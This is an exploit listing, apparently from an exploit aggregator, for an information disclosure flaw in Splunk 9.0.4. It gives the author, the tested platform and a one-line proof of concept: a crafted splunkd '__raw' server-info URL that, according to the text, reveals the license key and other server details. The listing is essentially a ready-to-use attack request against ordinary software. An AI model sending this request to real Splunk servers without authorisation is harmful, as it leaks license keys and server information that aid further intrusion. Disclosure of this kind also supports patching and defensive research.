Exploit for Splunk 9.0.4 Information Disclosure

Name: Exploit for Splunk 9.0.4 Information Disclosure
Rating: 5 (270 reviews)

2024-02-13 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:177090
# Exploit Title: Splunk 9.0.4 - Information Disclosure  
# Date: 2023-09-18  
# Exploit Author: Parsa rezaie khiabanloo  
# Vendor Homepage: https://www.splunk.com/  
# Version: 9.0.4   
# Tested on: Windows OS  
  
# Splunk through 9.0.4 allows information disclosure by appending  
# /__raw/services/server/info/server-info?output_mode=json to a query,  
# as demonstrated by discovering a license key and other information.  
  
# PoC :  
  
https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json